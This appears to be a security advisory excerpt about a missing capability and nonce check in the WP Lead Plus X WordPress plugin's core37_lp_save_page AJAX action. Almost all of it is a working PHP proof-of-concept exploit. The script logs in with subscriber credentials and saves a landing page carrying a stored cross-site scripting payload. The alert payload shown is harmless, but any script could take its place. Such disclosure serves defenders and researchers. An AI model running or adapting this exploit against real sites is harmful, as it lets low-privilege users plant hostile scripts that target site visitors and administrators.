WP Lead Plus X is a WordPress plugin that allows site owners to create custom landing and “squeeze” pages, complete with its own page builder interface capable of inserting custom JavaScript. Unfortunately, this page builder interface also relied on an unprotected AJAX action core37_lp_save_page which lacked a capability check and a nonce check in order to save and update pages.
<?php
// Settings
$url = $argv[1]; //URL of the site
$wp_user = $argv[2]; //Subscriber Username
$wp_pass = $argv[3]; //Subcriber Password
$urlbits = parse_url($url);
$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';
// Log in as subscriber
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-login.php');
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
'log' => $wp_user,
'pwd' => $wp_pass,
'wp-submit' => 'Log+In',
'testcookie' => '1'
)));
$output = curl_exec($ch);
curl_close($ch);
//Insert a page with stored XSS
$params=array(
'pageContent' => "%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-lp-172110%22%20style%3D%22width%3A%20700px%3B%22%20class%3D%22c37-lp%20c37-step%20ui-sortable%20ui-droppable%22%3E%0A%20%20%20%20%3Csection%20class%3D%22c37-section%20ui-sortable%20ui-droppable%22%20id%3D%22c37-section-643520%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-row%20d-flex%20flex-row%22%20id%3D%22c37-row-326243%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-col-md-12%20c37-col-sm-12%20c37-col-12%22%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-box-865567%22%20class%3D%22c37-box%20flex-column%20d-flex%20flex-column%20ui-sortable%20ui-droppable%22%3E%0A%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%0A%3Cdiv%20data-original%3D%22false%22%20data-c37-type%3D%22code%22%20class%3D%22c37-lp-element%20c37-item-element%20ui-draggable-handle%22%20id%3D%22c37-code-108583%22%3E%0A%20%20%20%20%3Cdiv%20data-content%3D%22%22%20class%3D%22c37-code-container%22%3E%3Cscript%3Ealert('xss!')%3B%3C%2Fscript%3E%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%0A%3C%2Fdiv%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%20%20%20%20%3C%2Fsection%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20",
'pageID' => isset($argv[4]) ? $argv[4] : '0',
'pageSlug'=>'poctest',
'pageTitle' => 'PoCTest',
'pageSettings' => '{"isVariant":false,"isPage":true,"variantPageID":0,"webFonts":[],"modelsJSON":{"c37-section-643520":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","layout":12,"containerClass":"","etype":"section","editingElementID":"c37-section-643520"},"c37-row-326243":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","horizontal":"","vertical":"","layout":"12","etype":"row","editingElementID":"c37-row-326243"},"c37-box-865567":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","horizontal":"","vertical":"","size":{"desktop":12,"tablet":12,"phone":12},"direction":"flex-column","etype":"box","editingElementID":"c37-box-865567"},"c37-code-108583":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","code":"%3Cscript%3Ealert(\'xss!\')%3B%3C%2Fscript%3E","etype":"code","editingElementID":"c37-code-108583"},"page":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","width":"700","codes":{"trackingCode":"","experimentCode":"","beforeBodyClosing":"","afterBodyOpening":"","metaCode":"","customCSSCode":""},"pageTitle":"PoC","pageSlug":"poc","weight":"1","cssID":"c37-lp-172110","editingElementID":"page","etype":"page"}},"flipCountdown":{},"simpleCountdown":{},"previewURL":"","imageSliders":{},"weight":1,"elementsActions":{},"jsCodes":{},"compiledCSS":""}',
'action' => 'core37_lp_save_page'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-admin/admin-ajax.php');
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded; charset=UTF-8', 'Connection: close'));
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
$output = curl_exec($ch);
echo $output;
curl_close($ch);